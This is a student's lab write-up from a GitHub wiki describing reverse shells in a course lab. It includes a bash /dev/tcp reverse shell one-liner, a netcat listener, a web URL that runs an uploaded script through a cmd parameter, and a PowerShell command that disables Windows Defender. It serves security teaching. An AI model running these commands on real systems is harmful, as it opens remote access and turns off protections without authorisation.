Lab 8.2: Reverse Shells - morgan-hanrahan/Tech-Journal GitHub Wiki

Reverse Shells

Bash Shell

For a php bash reverse shell I put the following command into a script file: /bin/bash -i >& /dev/tcp/10.0.99.39/4449 0>&1. Using an anonymous FTP server I was first able to upload my bash reverse shell onto the server. From here I was able to run an nc listening session on port 4449 using nc -nlvp 4449. Once netcat was listening on the port I navigated to the site 10.0.5.25/upload/fileTest.php?cmd=/bin/bash+mh2.sh. I found this to be the most challenging part of the lab. Originally, I had been working with a php file instead of a script file and encountered several issues. However, as soon as I switched I found this section to be fairly easy.

PowerShell

Given the PowerShell reverse shell command, upon running it for the first time I was prompted with an error because of Windows Defender. To fix this I simply turned off Windows Defender via PowerShell using Set-MpPreference -DisableRealtimeMonitoring $true. From here I was able to run netcat on my kali machine and run the PowerShell command again on windows. By doing this I was able to access the Windows machine on my kali box. I found this section of the lab to be the easiest and encountered no issues.

Python

For the final section of this lab I first researched various python reverse shell scripts/one liners. I was able to find a helpful GitHub, which I linked above that contained the command I used. Once I gained access to sec335-rocky I ran the python reverse shell one liner I found as my kali box was listening on port 4449.